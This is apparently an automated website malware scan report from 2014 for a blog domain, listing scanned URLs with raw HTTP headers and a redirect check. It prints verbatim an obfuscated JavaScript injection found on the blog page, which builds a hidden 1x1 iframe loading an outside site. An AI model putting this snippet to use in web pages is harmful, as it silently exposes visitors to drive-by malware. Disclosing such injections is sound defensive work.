Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rockstarsamson.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rockstarsamson.com/ | HTTP/1.1 302 Found Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Connection: close Date: Thu, 28 Aug 2014 23:56:12 GMT Location: http://www.rockstarsamson.com/blog Server: LiteSpeed Content-Length: 1148 Content-Type: text/html | clean |
http://www.rockstarsamson.com/blog | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 28 Aug 2014 23:56:12 GMT Location: http://www.rockstarsamson.com/blog/ Server: LiteSpeed Content-Length: 1172 Content-Type: text/html | clean |
http://www.rockstarsamson.com/blog/ | 200 OK Content-Length: 9195 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=String.fromCharCode;if(typeof(hlwhk)==e(117,110,100,101,102,105,110,101,100)){hlwhk=1;c=document;n=c[e(99,114,101,97,116,101,69,108,101,109,101,110,116)](e(105,102,114,97,109,101));n[e(115,114,99)]=e(104,116,116,112,58,47,47,108,117,112,121,116,101,104,111,113,46,99,111,109,47,118,56,55,50,121,51,46,104,116,109);n[e(119,105,100,116,104)]=1;n[e(104,101,105,103,104,116)]=1;n[e(102,114,97,109,101,66,111,114,100,101,114)]=0;c[e(98,111,100,121)][e(97,112,112,101,110,100,67,104,105,108,100)](n);} Antivirus reports:
http://www.flickr.com/badge_code.gne?nsid=92201830@N00&count=6&display=random&name=0&size=square&raw=1 | 200 OK Content-Length: 1169 Content-Type: text/html | clean |
http://www.flickr.com/photos/erikarenee/312992835/ | HTTP/1.1 302 Found Cache-Control: private Connection: close Date: Thu, 28 Aug 2014 23:56:24 GMT Via: http/1.1 fts108.flickr.bf1.yahoo.com (ApacheTrafficServer/4.0.2 [cMsSf ]), http/1.1 r04.ycpi.dee.yahoo.net (ApacheTrafficServer [cMsSf ]) Age: 0 Location: https://www.flickr.com/photos/erikarenee/312992835/ Server: ATS Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: BX=fm0c2nd9vvgd8&b=3&s=uv; expires=Sun, 28-Aug-2016 23:56:24 GMT; path=/; domain=.flickr.com Set-Cookie: xb=275065; expires=Sun, 28-Aug-2016 23:56:24 GMT; path=/; domain=.flickr.com X-Content-Type-Options: NOSNIFF X-Served-By: www265.flickr.bf1.yahoo.com | clean |
https://www.flickr.com/photos/erikarenee/312992835/ | 200 OK Content-Length: 173508 Content-Type: text/html | clean |
https://s.yimg.com/pw/combo/1/3.11.0?j/yui/3.11.0/yui/yui-.E.A.v2&j/yui/3.11.0/.FN/.FN-.E.A.vX&j/lighthouse.A.v47RzvUr | 200 OK Content-Length: 150436 Content-Type: application/x-javascript | clean |
https://s.yimg.com/uv/dm/ad-ros-0.0.2.js | 200 OK Content-Length: 3119 Content-Type: application/x-javascript | clean |
https://s.yimg.com/zz/combo?kx/yucs/uh3/uh/1078/js/uh-min.js&kx/yucs/uh3/uh/1078/js/menu_utils_v3-min.js&kx/yucs/uhc/meta/16/js/meta-min.js&kx/yucs/uh3/top-bar/321/js/top_bar_v3-min.js | 200 OK Content-Length: 14622 Content-Type: application/javascript | clean |
https://www.flickr.com/ | 200 OK Content-Length: 163543 Content-Type: text/html | clean |
https://s.yimg.com/pw/combo/1/3.11.0?j/yui/3.11.0/yui/yui-.E.A.v2&j/yui/3.11.0/.FN/.FN-.E.A.vX | 200 OK Content-Length: 140247 Content-Type: application/x-javascript | clean |
https://www.flickr.com/signin/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, private Cache-Control: post-check=0, pre-check=0 Connection: close Date: Thu, 28 Aug 2014 23:56:35 GMT Pragma: no-cache Via: http/1.1 fts124.flickr.bf1.yahoo.com (ApacheTrafficServer/4.0.2 [cMsSf ]), http/1.1 r11.ycpi.ams.yahoo.net (ApacheTrafficServer [cMsSf ]) Age: 0 Location: https://login.yahoo.com/config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c%3DH6T9XcS72e4mRnW3NpTAiU8ZkA--&.intl=lt&.lang=en&mg=1&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Fvalidate%3F.src%3Dflickrsignin%26.pc%3D8190%26.scrumb%3D0%26.pd%3Dc%253DJvVF95K62e6PzdPu7MBv2V8-%26.intl%3Dlt%26.done%3Dhttps%253A%252F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F Server: ATS Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Thu, 28 Aug 2014 23:56:35 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: BX=0pu58n59vvgdj&b=3&s=pg; expires=Sun, 28-Aug-2016 23:56:35 GMT; path=/; domain=.flickr.com Set-Cookie: xb=005029; expires=Sun, 28-Aug-2016 23:56:35 GMT; path=/; domain=.flickr.com Set-Cookie: localization=en-us%3Bxx%3Blt; expires=Thu, 25-Aug-2016 23:56:35 GMT; path=/; domain=.flickr.com Set-Cookie: flrb=53; expires=Fri, 29-Aug-2014 01:56:35 GMT; path=/; domain=.flickr.com; httponly X-Content-Type-Options: NOSNIFF X-Served-By: www335.flickr.bf1.yahoo.com | clean |
https://login.yahoo.com/config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c%3dh6t9xcs72e4mrnw3nptaiu8zka--&.intl=lt&.lang=en&mg=1&.done=https%3a%2f%2flogin.yahoo.com%2fconfig%2fvalidate%3f.src%3dflickrsignin%26.pc%3d8190%26.scrumb%3d0%26.pd%3dc%253djvvf95k62e6pzdpu7mbv2v8-%26.intl%3dlt%26.done%3dhttps%253a%252f%252fwww.flickr.com%252fsignin%252fyahoo%252f | 200 OK Content-Length: 140706 Content-Type: text/html | clean |
https://s.yimg.com/zz/combo?yui:2.8.2/build/yahoo-dom-event/yahoo-dom-event.js | 200 OK Content-Length: 36977 Content-Type: application/javascript | clean |
https://s.yimg.com/zz/combo?yui:2.8.2/build/yahoo-dom-event/yahoo-dom-event.js&yui:2.8.2/build/animation/animation-min.js&yui:2.8.2/build/connection/connection_core-min.js&sf/l/2.6.66/j/centerIframe-min.js&sf/l/2.6.65/j/capslock_ui-min.js&sf/l/2.6.65/j/login_md5-min.js | 200 OK Content-Length: 67058 Content-Type: application/javascript | clean |
https://s.yimg.com/lq/lib/reg/js/yahoo_container-min_json-min_connection_main-min-new.js | 200 OK Content-Length: 132448 Content-Type: application/javascript | clean |
https://s.yimg.com/rq/darla/2-7-5/js/g-r-min.js | 200 OK Content-Length: 120649 Content-Type: application/x-javascript | clean |
http://www.flickr.com/test404page.js | HTTP/1.1 302 Found Cache-Control: private Connection: close Date: Thu, 28 Aug 2014 23:56:43 GMT Via: http/1.1 fts121.flickr.bf1.yahoo.com (ApacheTrafficServer/4.0.2 [cMsSf ]), http/1.1 r09.ycpi.ams.yahoo.net (ApacheTrafficServer [cMsSf ]) Age: 0 Location: https://www.flickr.com/test404page.js Server: ATS Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: BX=eiads199vvgdr&b=3&s=1v; expires=Sun, 28-Aug-2016 23:56:43 GMT; path=/; domain=.flickr.com Set-Cookie: xb=062753; expires=Sun, 28-Aug-2016 23:56:43 GMT; path=/; domain=.flickr.com X-Content-Type-Options: NOSNIFF X-Served-By: www42.flickr.bf1.yahoo.com | clean |
https://www.flickr.com/test404page.js | 404 Not Found Content-Length: 107114 Content-Type: text/html | clean |
https://s.yimg.com/pw/javascript/global.js.v2055206793.37 | 200 OK Content-Length: 58322 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rockstarsamson.com
Result:
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Connection: close
Date: Thu, 28 Aug 2014 23:56:12 GMT
Location: http://www.rockstarsamson.com/blog
Server: LiteSpeed
Content-Length: 1148
Content-Type: text/html
...1148 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rockstarsamson.com
Referer: http://www.google.com/search?q=rockstarsamson.com
Result:
The result is similar to the first query. There are no suspicious redirects found.